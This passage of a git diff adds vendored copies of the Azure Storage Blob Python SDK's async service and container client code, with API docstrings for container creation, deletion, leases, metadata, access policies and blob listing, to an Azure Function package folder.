+            command, results_per_page=results_per_page,
+            page_iterator_class=FilteredBlobPaged)
+
+    @distributed_trace_async
+    async def create_container(
+            self, name, # type: str
+            metadata=None, # type: Optional[Dict[str, str]]
+            public_access=None, # type: Optional[Union[PublicAccess, str]]
+            **kwargs
+        ):
+        # type: (...) -> ContainerClient
+        """Creates a new container under the specified account.
+
+        If the container with the same name already exists, a ResourceExistsError will
+        be raised. This method returns a client with which to interact with the newly
+        created container.
+
+        :param str name: The name of the container to create.
+        :param metadata:
+            A dict with name-value pairs to associate with the
+            container as metadata. Example: `{'Category':'test'}`
+        :type metadata: dict(str, str)
+        :param public_access:
+            Possible values include: 'container', 'blob'.
+        :type public_access: str or ~azure.storage.blob.PublicAccess
+        :keyword container_encryption_scope:
+            Specifies the default encryption scope to set on the container and use for
+            all future writes.
+
+            .. versionadded:: 12.2.0
+
+        :paramtype container_encryption_scope: dict or ~azure.storage.blob.ContainerEncryptionScope
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :rtype: ~azure.storage.blob.aio.ContainerClient
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_service_async.py
+                :start-after: [START bsc_create_container]
+                :end-before: [END bsc_create_container]
+                :language: python
+                :dedent: 16
+                :caption: Creating a container in the blob service.
+        """
+        container = self.get_container_client(name)
+        timeout = kwargs.pop('timeout', None)
+        kwargs.setdefault('merge_span', True)
+        await container.create_container(
+            metadata=metadata, public_access=public_access, timeout=timeout, **kwargs)
+        return container
+
+    @distributed_trace_async
+    async def delete_container(
+            self, container, # type: Union[ContainerProperties, str]
+            lease=None, # type: Optional[Union[BlobLeaseClient, str]]
+            **kwargs
+        ):
+        # type: (...) -> None
+        """Marks the specified container for deletion.
+
+        The container and any blobs contained within it are later deleted during garbage collection.
+        If the container is not found, a ResourceNotFoundError will be raised.
+
+        :param container:
+            The container to delete. This can either be the name of the container,
+            or an instance of ContainerProperties.
+        :type container: str or ~azure.storage.blob.ContainerProperties
+        :param lease:
+            If specified, delete_container only succeeds if the
+            container's lease is active and matches this ID.
+            Required if the container has an active lease.
+ :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START bsc_delete_container] + :end-before: [END bsc_delete_container] + :language: python + :dedent: 16 + :caption: Deleting a container in the blob service. + """ + container = self.get_container_client(container) # type: ignore + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + await container.delete_container( # type: ignore + lease=lease, + timeout=timeout, + **kwargs) + + @distributed_trace_async + async def _rename_container(self, name, new_name, **kwargs): + # type: (str, str, **Any) -> ContainerClient + """Renames a container. + + Operation is successful only if the source container exists. + + :param str name: + The name of the container to rename. + :param str new_name: + The new container name the user wants to rename to. + :keyword lease: + Specify this to perform only if the lease ID given + matches the active lease ID of the source container. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: ~azure.storage.blob.ContainerClient + """ + renamed_container = self.get_container_client(new_name) + lease = kwargs.pop('lease', None) + try: + kwargs['source_lease_id'] = lease.id # type: str + except AttributeError: + kwargs['source_lease_id'] = lease + try: + await renamed_container._client.container.rename(name, **kwargs) # pylint: disable = protected-access + return renamed_container + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def undelete_container(self, deleted_container_name, deleted_container_version, **kwargs): + # type: (str, str, **Any) -> ContainerClient + """Restores soft-deleted container. + + Operation will only be successful if used within the specified number of days + set in the delete retention policy. + + .. versionadded:: 12.4.0 + This operation was introduced in API version '2019-12-12'. + + :param str deleted_container_name: + Specifies the name of the deleted container to restore. + :param str deleted_container_version: + Specifies the version of the deleted container to restore. + :keyword int timeout: + The timeout parameter is expressed in seconds. 
+ :rtype: ~azure.storage.blob.aio.ContainerClient + """ + new_name = kwargs.pop('new_name', None) + if new_name: + warnings.warn("`new_name` is no longer supported.", DeprecationWarning) + container = self.get_container_client(new_name or deleted_container_name) + try: + await container._client.container.restore(deleted_container_name=deleted_container_name, # pylint: disable = protected-access + deleted_container_version=deleted_container_version, + timeout=kwargs.pop('timeout', None), **kwargs) + return container + except HttpResponseError as error: + process_storage_error(error) + + def get_container_client(self, container): + # type: (Union[ContainerProperties, str]) -> ContainerClient + """Get a client to interact with the specified container. + + The container need not already exist. + + :param container: + The container. This can either be the name of the container, + or an instance of ContainerProperties. + :type container: str or ~azure.storage.blob.ContainerProperties + :returns: A ContainerClient. + :rtype: ~azure.storage.blob.aio.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START bsc_get_container_client] + :end-before: [END bsc_get_container_client] + :language: python + :dedent: 12 + :caption: Getting the container client to interact with a specific container. + """ + try: + container_name = container.name + except AttributeError: + container_name = container + _pipeline = AsyncPipeline( + transport=AsyncTransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return ContainerClient( + self.url, container_name=container_name, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) + + def get_blob_client( + self, container, # type: Union[ContainerProperties, str] + blob, # type: Union[BlobProperties, str] + snapshot=None # type: Optional[Union[Dict[str, Any], str]] + ): + # type: (...) -> BlobClient + """Get a client to interact with the specified blob. + + The blob need not already exist. + + :param container: + The container that the blob is in. This can either be the name of the container, + or an instance of ContainerProperties. + :type container: str or ~azure.storage.blob.ContainerProperties + :param blob: + The blob with which to interact. This can either be the name of the blob, + or an instance of BlobProperties. + :type blob: str or ~azure.storage.blob.BlobProperties + :param snapshot: + The optional blob snapshot on which to operate. This can either be the ID of the snapshot, + or a dictionary output returned by + :func:`~azure.storage.blob.aio.BlobClient.create_snapshot()`. + :type snapshot: str or dict(str, Any) + :returns: A BlobClient. + :rtype: ~azure.storage.blob.aio.BlobClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START bsc_get_blob_client] + :end-before: [END bsc_get_blob_client] + :language: python + :dedent: 16 + :caption: Getting the blob client to interact with a specific blob. 
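+
+ A minimal sketch (container and blob names are hypothetical):
+
+ .. code-block:: python
+
+     # No network call is made here; the blob need not exist yet.
+     blob_client = service_client.get_blob_client("reports", "2023/summary.csv")
+     stream = await blob_client.download_blob()
+     data = await stream.readall()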
+ """ + try: + container_name = container.name + except AttributeError: + container_name = container + + try: + blob_name = blob.name + except AttributeError: + blob_name = blob + _pipeline = AsyncPipeline( + transport=AsyncTransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return BlobClient( # type: ignore + self.url, container_name=container_name, blob_name=blob_name, snapshot=snapshot, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_container_client_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_container_client_async.py new file mode 100644 index 0000000..51822cd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_container_client_async.py @@ -0,0 +1,1266 @@ +# pylint: disable=too-many-lines +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=invalid-overridden-method +import functools +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, AnyStr, Dict, List, IO, AsyncIterator, + TYPE_CHECKING +) + +from azure.core.exceptions import HttpResponseError, ResourceNotFoundError +from azure.core.tracing.decorator import distributed_trace +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.async_paging import AsyncItemPaged +from azure.core.pipeline import AsyncPipeline +from azure.core.pipeline.transport import AsyncHttpResponse + +from .._shared.base_client_async import AsyncStorageAccountHostsMixin, AsyncTransportWrapper +from .._shared.policies_async import ExponentialRetry +from .._shared.request_handlers import add_metadata_headers, serialize_iso +from .._shared.response_handlers import ( + process_storage_error, + return_response_headers, + return_headers_and_deserialized) +from .._generated.aio import AzureBlobStorage +from .._generated.models import SignedIdentifier +from .._deserialize import deserialize_container_properties +from .._serialize import get_modify_conditions, get_container_cpk_scope_info, get_api_version, get_access_conditions +from .._container_client import ContainerClient as ContainerClientBase, _get_blob_name +from .._models import ContainerProperties, BlobType, BlobProperties, FilteredBlob # pylint: disable=unused-import +from ._list_blobs_helper import BlobPropertiesPaged, BlobPrefix +from ._lease_async import BlobLeaseClient +from ._blob_client_async import BlobClient +from ._models import FilteredBlobPaged + +if TYPE_CHECKING: + from .._models import PublicAccess + from ._download_async import StorageStreamDownloader + from datetime import datetime + from .._models import ( # pylint: disable=unused-import + AccessPolicy, + StandardBlobTier, + PremiumPageBlobTier) + + +class 
ContainerClient(AsyncStorageAccountHostsMixin, ContainerClientBase):
+ """A client to interact with a specific container, although that container
+ may not yet exist.
+
+ For operations relating to a specific blob within this container, a blob client can be
+ retrieved using the :func:`~get_blob_client` function.
+
+ :param str account_url:
+ The URI to the storage account. In order to create a client given the full URI to the container,
+ use the :func:`from_container_url` classmethod.
+ :param container_name:
+ The name of the container for the blob.
+ :type container_name: str
+ :param credential:
+ The credentials with which to authenticate. This is optional if the
+ account URL already has a SAS token. The value can be a SAS token string,
+ an instance of an AzureSasCredential from azure.core.credentials, an account
+ shared access key, or an instance of a TokenCredentials class from azure.identity.
+ If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential
+ - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError.
+ :keyword str api_version:
+ The Storage API version to use for requests. Default value is the most recent service version that is
+ compatible with the current SDK. Setting to an older version may result in reduced feature compatibility.
+
+ .. versionadded:: 12.2.0
+
+ :keyword str secondary_hostname:
+ The hostname of the secondary endpoint.
+ :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks.
+ Defaults to 4*1024*1024, or 4MB.
+ :keyword int max_single_put_size: If the blob size is less than or equal to max_single_put_size, then the blob
+ will be uploaded with only one HTTP PUT request. If the blob size is larger than max_single_put_size,
+ the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB.
+ :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory efficient
+ algorithm when uploading a block blob. Defaults to 4*1024*1024+1.
+ :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False.
+ :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB.
+ :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call;
+ any part exceeding this size will be downloaded in chunks (potentially in parallel). Defaults to
+ 32*1024*1024, or 32MB.
+ :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024,
+ or 4MB.
+
+ .. admonition:: Example:
+
+ .. literalinclude:: ../samples/blob_samples_containers_async.py
+ :start-after: [START create_container_client_from_service]
+ :end-before: [END create_container_client_from_service]
+ :language: python
+ :dedent: 8
+ :caption: Get a ContainerClient from an existing BlobServiceClient.
+
+ .. literalinclude:: ../samples/blob_samples_containers_async.py
+ :start-after: [START create_container_client_sasurl]
+ :end-before: [END create_container_client_sasurl]
+ :language: python
+ :dedent: 12
+ :caption: Creating the container client directly.
+ """
+ def __init__(
+ self, account_url, # type: str
+ container_name, # type: str
+ credential=None, # type: Optional[Any]
+ **kwargs # type: Any
+ ):
+ # type: (...) -> None
+ kwargs['retry_policy'] = kwargs.get('retry_policy') or ExponentialRetry(**kwargs)
+ super(ContainerClient, self).__init__(
+ account_url,
+ container_name=container_name,
+ credential=credential,
+ **kwargs)
+ self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline)
+ self._client._config.version = get_api_version(kwargs) # pylint: disable=protected-access
+
+ @distributed_trace_async
+ async def create_container(self, metadata=None, public_access=None, **kwargs):
+ # type: (Optional[Dict[str, str]], Optional[Union[PublicAccess, str]], **Any) -> Dict[str, Union[str, datetime]]
+ """
+ Creates a new container under the specified account. If a container
+ with the same name already exists, the operation fails.
+
+ :param metadata:
+ A dict with name-value pairs to associate with the
+ container as metadata. Example: {'Category':'test'}
+ :type metadata: dict[str, str]
+ :param ~azure.storage.blob.PublicAccess public_access:
+ Possible values include: 'container', 'blob'.
+ :keyword container_encryption_scope:
+ Specifies the default encryption scope to set on the container and use for
+ all future writes.
+
+ .. versionadded:: 12.2.0
+
+ :paramtype container_encryption_scope: dict or ~azure.storage.blob.ContainerEncryptionScope
+ :keyword int timeout:
+ The timeout parameter is expressed in seconds.
+ :returns: A dictionary of response headers.
+ :rtype: Dict[str, Union[str, datetime]]
+
+ .. admonition:: Example:
+
+ .. literalinclude:: ../samples/blob_samples_containers_async.py
+ :start-after: [START create_container]
+ :end-before: [END create_container]
+ :language: python
+ :dedent: 16
+ :caption: Creating a container to store blobs.
+ """
+ headers = kwargs.pop('headers', {})
+ headers.update(add_metadata_headers(metadata)) # type: ignore
+ timeout = kwargs.pop('timeout', None)
+ container_cpk_scope_info = get_container_cpk_scope_info(kwargs)
+ try:
+ return await self._client.container.create( # type: ignore
+ timeout=timeout,
+ access=public_access,
+ container_cpk_scope_info=container_cpk_scope_info,
+ cls=return_response_headers,
+ headers=headers,
+ **kwargs)
+ except HttpResponseError as error:
+ process_storage_error(error)
+
+ @distributed_trace_async
+ async def _rename_container(self, new_name, **kwargs):
+ # type: (str, **Any) -> ContainerClient
+ """Renames a container.
+
+ Operation is successful only if the source container exists.
+
+ :param str new_name:
+ The new container name the user wants to rename to.
+ :keyword lease:
+ Specify this to perform the operation only if the lease ID given
+ matches the active lease ID of the source container.
+ :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+ :keyword int timeout:
+ The timeout parameter is expressed in seconds.
+ :rtype: ~azure.storage.blob.ContainerClient + """ + lease = kwargs.pop('lease', None) + try: + kwargs['source_lease_id'] = lease.id # type: str + except AttributeError: + kwargs['source_lease_id'] = lease + try: + renamed_container = ContainerClient( + "{}://{}".format(self.scheme, self.primary_hostname), container_name=new_name, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=self._pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) + await renamed_container._client.container.rename(self.container_name, **kwargs) # pylint: disable = protected-access + return renamed_container + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def delete_container( + self, **kwargs): + # type: (Any) -> None + """ + Marks the specified container for deletion. The container and any blobs + contained within it are later deleted during garbage collection. + + :keyword lease: + If specified, delete_container only succeeds if the + container's lease is active and matches this ID. + Required if the container has an active lease. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START delete_container] + :end-before: [END delete_container] + :language: python + :dedent: 16 + :caption: Delete a container. + """ + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + mod_conditions = get_modify_conditions(kwargs) + timeout = kwargs.pop('timeout', None) + try: + await self._client.container.delete( + timeout=timeout, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def acquire_lease( + self, lease_duration=-1, # type: int + lease_id=None, # type: Optional[str] + **kwargs): + # type: (...) -> BlobLeaseClient + """ + Requests a new lease. If the container does not have an active lease, + the Blob service creates a lease on the container and returns a new + lease ID. 
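+
+ A minimal lease-lifecycle sketch (metadata values are illustrative):
+
+ .. code-block:: python
+
+     # Acquire a 15-second lease, use it for a leased operation, then release it.
+     lease = await container_client.acquire_lease(lease_duration=15)
+     try:
+         await container_client.set_container_metadata({'owner': 'demo'}, lease=lease)
+     finally:
+         await lease.release()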
+ + :param int lease_duration: + Specifies the duration of the lease, in seconds, or negative one + (-1) for a lease that never expires. A non-infinite lease can be + between 15 and 60 seconds. A lease duration cannot be changed + using renew or change. Default is -1 (infinite lease). + :param str lease_id: + Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A BlobLeaseClient object, that can be run in a context manager. + :rtype: ~azure.storage.blob.aio.BlobLeaseClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START acquire_lease_on_container] + :end-before: [END acquire_lease_on_container] + :language: python + :dedent: 12 + :caption: Acquiring a lease on the container. + """ + lease = BlobLeaseClient(self, lease_id=lease_id) # type: ignore + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + await lease.acquire(lease_duration=lease_duration, timeout=timeout, **kwargs) + return lease + + @distributed_trace_async + async def get_account_information(self, **kwargs): + # type: (**Any) -> Dict[str, str] + """Gets information related to the storage account. + + The information can also be retrieved if the user has a SAS to a container or blob. + The keys in the returned dictionary include 'sku_name' and 'account_kind'. + + :returns: A dict of account information (SKU and account type). + :rtype: dict(str, str) + """ + try: + return await self._client.container.get_account_info(cls=return_response_headers, **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def get_container_properties(self, **kwargs): + # type: (**Any) -> ContainerProperties + """Returns all user-defined metadata and system properties for the specified + container. The data returned does not include the container's list of blobs. + + :keyword lease: + If specified, get_container_properties only succeeds if the + container's lease is active and matches this ID. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: Properties for the specified container within a container object. 
+ :rtype: ~azure.storage.blob.ContainerProperties
+
+ .. admonition:: Example:
+
+ .. literalinclude:: ../samples/blob_samples_containers_async.py
+ :start-after: [START get_container_properties]
+ :end-before: [END get_container_properties]
+ :language: python
+ :dedent: 16
+ :caption: Getting properties on the container.
+ """
+ lease = kwargs.pop('lease', None)
+ access_conditions = get_access_conditions(lease)
+ timeout = kwargs.pop('timeout', None)
+ try:
+ response = await self._client.container.get_properties(
+ timeout=timeout,
+ lease_access_conditions=access_conditions,
+ cls=deserialize_container_properties,
+ **kwargs)
+ except HttpResponseError as error:
+ process_storage_error(error)
+ response.name = self.container_name
+ return response # type: ignore
+
+ @distributed_trace_async
+ async def exists(self, **kwargs):
+ # type: (**Any) -> bool
+ """
+ Returns True if the container exists, False otherwise.
+
+ :keyword int timeout:
+ The timeout parameter is expressed in seconds.
+ :returns: True if the container exists, False otherwise.
+ :rtype: bool
+ """
+ try:
+ await self._client.container.get_properties(**kwargs)
+ return True
+ except HttpResponseError as error:
+ try:
+ process_storage_error(error)
+ except ResourceNotFoundError:
+ return False
+
+ @distributed_trace_async
+ async def set_container_metadata( # type: ignore
+ self, metadata=None, # type: Optional[Dict[str, str]]
+ **kwargs
+ ):
+ # type: (...) -> Dict[str, Union[str, datetime]]
+ """Sets one or more user-defined name-value pairs for the specified
+ container. Each call to this operation replaces all existing metadata
+ attached to the container. To remove all metadata from the container,
+ call this operation with no metadata dict.
+
+ :param metadata:
+ A dict containing name-value pairs to associate with the container as
+ metadata. Example: {'category':'test'}
+ :type metadata: dict[str, str]
+ :keyword lease:
+ If specified, set_container_metadata only succeeds if the
+ container's lease is active and matches this ID.
+ :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str
+ :keyword ~datetime.datetime if_modified_since:
+ A DateTime value. Azure expects the date value passed in to be UTC.
+ If timezone is included, any non-UTC datetimes will be converted to UTC.
+ If a date is passed in without timezone info, it is assumed to be UTC.
+ Specify this header to perform the operation only
+ if the resource has been modified since the specified time.
+ :keyword int timeout:
+ The timeout parameter is expressed in seconds.
+ :returns: Container-updated property dict (Etag and last modified).
+
+ .. admonition:: Example:
+
+ .. literalinclude:: ../samples/blob_samples_containers_async.py
+ :start-after: [START set_container_metadata]
+ :end-before: [END set_container_metadata]
+ :language: python
+ :dedent: 16
+ :caption: Setting metadata on the container.
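+
+ A short sketch (metadata values are illustrative). Because each call replaces
+ all existing metadata, calling with no arguments clears it:
+
+ .. code-block:: python
+
+     await container_client.set_container_metadata({'category': 'test'})
+     # Replaces everything set above, leaving the container with no metadata.
+     await container_client.set_container_metadata()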
+ """ + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + mod_conditions = get_modify_conditions(kwargs) + timeout = kwargs.pop('timeout', None) + try: + return await self._client.container.set_metadata( # type: ignore + timeout=timeout, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + headers=headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def _get_blob_service_client(self): # pylint: disable=client-method-missing-kwargs + # type: (...) -> BlobServiceClient + """Get a client to interact with the container's parent service account. + + Defaults to current container's credentials. + + :returns: A BlobServiceClient. + :rtype: ~azure.storage.blob.BlobServiceClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START get_blob_service_client_from_container_client] + :end-before: [END get_blob_service_client_from_container_client] + :language: python + :dedent: 8 + :caption: Get blob service client from container object. + """ + from ._blob_service_client_async import BlobServiceClient + if not isinstance(self._pipeline._transport, AsyncTransportWrapper): # pylint: disable = protected-access + _pipeline = AsyncPipeline( + transport=AsyncTransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + else: + _pipeline = self._pipeline # pylint: disable = protected-access + return BlobServiceClient( + "{}://{}".format(self.scheme, self.primary_hostname), + credential=self._raw_credential, api_version=self.api_version, _configuration=self._config, + _location_mode=self._location_mode, _hosts=self._hosts, require_encryption=self.require_encryption, + key_encryption_key=self.key_encryption_key, key_resolver_function=self.key_resolver_function, + _pipeline=_pipeline) + + + @distributed_trace_async + async def get_container_access_policy(self, **kwargs): + # type: (Any) -> Dict[str, Any] + """Gets the permissions for the specified container. + The permissions indicate whether container data may be accessed publicly. + + :keyword lease: + If specified, get_container_access_policy only succeeds if the + container's lease is active and matches this ID. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Access policy information in a dict. + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START get_container_access_policy] + :end-before: [END get_container_access_policy] + :language: python + :dedent: 16 + :caption: Getting the access policy on the container. 
+ """ + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + timeout = kwargs.pop('timeout', None) + try: + response, identifiers = await self._client.container.get_access_policy( + timeout=timeout, + lease_access_conditions=access_conditions, + cls=return_headers_and_deserialized, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return { + 'public_access': response.get('blob_public_access'), + 'signed_identifiers': identifiers or [] + } + + @distributed_trace_async + async def set_container_access_policy( + self, signed_identifiers, # type: Dict[str, AccessPolicy] + public_access=None, # type: Optional[Union[str, PublicAccess]] + **kwargs # type: Any + ): # type: (...) -> Dict[str, Union[str, datetime]] + """Sets the permissions for the specified container or stored access + policies that may be used with Shared Access Signatures. The permissions + indicate whether blobs in a container may be accessed publicly. + + :param signed_identifiers: + A dictionary of access policies to associate with the container. The + dictionary may contain up to 5 elements. An empty dictionary + will clear the access policies set on the service. + :type signed_identifiers: dict[str, ~azure.storage.blob.AccessPolicy] + :param ~azure.storage.blob.PublicAccess public_access: + Possible values include: 'container', 'blob'. + :keyword lease: + Required if the container has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A datetime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified date/time. + :keyword ~datetime.datetime if_unmodified_since: + A datetime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Container-updated property dict (Etag and last modified). + :rtype: dict[str, str or ~datetime.datetime] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START set_container_access_policy] + :end-before: [END set_container_access_policy] + :language: python + :dedent: 16 + :caption: Setting access policy on the container. + """ + timeout = kwargs.pop('timeout', None) + lease = kwargs.pop('lease', None) + if len(signed_identifiers) > 5: + raise ValueError( + 'Too many access policies provided. 
The server does not support setting ' + 'more than 5 access policies on a single resource.') + identifiers = [] + for key, value in signed_identifiers.items(): + if value: + value.start = serialize_iso(value.start) + value.expiry = serialize_iso(value.expiry) + identifiers.append(SignedIdentifier(id=key, access_policy=value)) # type: ignore + signed_identifiers = identifiers # type: ignore + + mod_conditions = get_modify_conditions(kwargs) + access_conditions = get_access_conditions(lease) + try: + return await self._client.container.set_access_policy( + container_acl=signed_identifiers or None, + timeout=timeout, + access=public_access, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def list_blobs(self, name_starts_with=None, include=None, **kwargs): + # type: (Optional[str], Optional[Union[str, List[str]]], **Any) -> AsyncItemPaged[BlobProperties] + """Returns a generator to list the blobs under the specified container. + The generator will lazily follow the continuation tokens returned by + the service. + + :param str name_starts_with: + Filters the results to return only blobs whose names + begin with the specified prefix. + :param list[str] or str include: + Specifies one or more additional datasets to include in the response. + Options include: 'snapshots', 'metadata', 'uncommittedblobs', 'copy', 'deleted', 'deletedwithversions', + 'tags', 'versions'. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) response of BlobProperties. + :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.storage.blob.BlobProperties] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START list_blobs_in_container] + :end-before: [END list_blobs_in_container] + :language: python + :dedent: 12 + :caption: List the blobs in the container. + """ + if include and not isinstance(include, list): + include = [include] + + results_per_page = kwargs.pop('results_per_page', None) + timeout = kwargs.pop('timeout', None) + command = functools.partial( + self._client.container.list_blob_flat_segment, + include=include, + timeout=timeout, + **kwargs) + return AsyncItemPaged( + command, + prefix=name_starts_with, + results_per_page=results_per_page, + page_iterator_class=BlobPropertiesPaged + ) + + @distributed_trace + def walk_blobs( + self, name_starts_with=None, # type: Optional[str] + include=None, # type: Optional[Any] + delimiter="/", # type: str + **kwargs # type: Optional[Any] + ): + # type: (...) -> AsyncItemPaged[BlobProperties] + """Returns a generator to list the blobs under the specified container. + The generator will lazily follow the continuation tokens returned by + the service. This operation will list blobs in accordance with a hierarchy, + as delimited by the specified delimiter character. + + :param str name_starts_with: + Filters the results to return only blobs whose names + begin with the specified prefix. + :param list[str] include: + Specifies one or more additional datasets to include in the response. + Options include: 'snapshots', 'metadata', 'uncommittedblobs', 'copy', 'deleted'. 
+ :param str delimiter:
